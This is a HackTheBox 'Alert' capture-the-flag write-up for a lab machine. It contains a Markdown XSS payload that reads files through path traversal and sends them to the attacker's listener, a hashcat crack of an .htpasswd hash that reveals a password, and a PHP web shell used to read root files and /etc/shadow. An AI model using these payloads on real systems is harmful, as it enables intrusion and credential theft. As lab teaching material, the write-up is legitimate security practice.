Post

HackTheBox Alert Writeup

Explore the fundamentals of cybersecurity in the Alert Capture The Flag (CTF) challenge, a easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts

1
10.10.11.44 alert.htb statistics.alert.htb

Script to add hosts automatically

1
2
3
ip="10.10.11.44"
domain="alert.htb statistics.alert.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

1
nmap -sCV alert.htb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
Nmap scan report for alert.htb (10.10.11.44)
Host is up (0.055s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
|   256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
|_  256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: Alert - Markdown Viewer
|_Requested resource was index.php?page=alert
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Subdomain

1
ffuf -w /usr/share/dict/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -u http://alert.htb -H 'Host: FUZZ.alert.htb' -fw 20
1
statistics              [Status: 401, Size: 467, Words: 42, Lines: 15, Duration: 54ms]

WebServer:

1
python -m http.server

Markdown xss:

1
2
3
4
5
6
7
8
<script>
fetch("http://alert.htb/messages.php?file=../../../../../etc/apache2/sites-enabled/000-default.conf")
.then(response => response.text())
.then(data => {
    fetch("http://<vpnip>:8000/?data=" + encodeURIComponent(data));
})
.catch(error => console.error("Error fetching the messages:", error));
</script>

Url decode the response

This shows /var/www/statistics.alert.htb/.htpasswd so

1
2
3
4
5
6
7
8
<script>
fetch("http://alert.htb/messages.php?file=../../../../../var/www/statistics.alert.htb/.htpasswd")
.then(response => response.text())
.then(data => {
    fetch("http://<vpnip>:8000/?data=" + encodeURIComponent(data));
})
.catch(error => console.error("Error fetching the messages:", error));
</script>

Url decode the response

Brute Force the Hash

1
2
3
4
5
echo -n "Password Hash? -->" ; read hash
echo "$hash" > /tmp/hash.txt
hashcat -m 1600 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat /tmp/hash.txt --show
rm -rf /tmp/hash.txt

This yields manchesterunited

1
ssh -L 8080:127.0.0.1:8080 albert@alert.htb
1
2
3
cat user.txt
cd /opt/website-monitor/config
echo '<?php system($_GET['cmd']);?>' > webshell.php

in your machine:

1
curl -s 'http://127.0.0.1:8080/config/webshell.php?cmd=cat%20/root/root.txt'
1
curl -s 'http://127.0.0.1:8080/config/webshell.php?cmd=cat%20/etc/shadow'

$6$gSjyQo8nJFMsegNG$jRRGms4KAq1FGTXwBJl236Ui5OKRtmaM3k8nkXuvduPXnhhaT/ZCYHHYO3GxhUAik1NaFYlBGaQZBrzQHgOhc/

This post is licensed under CC BY 4.0 by the author.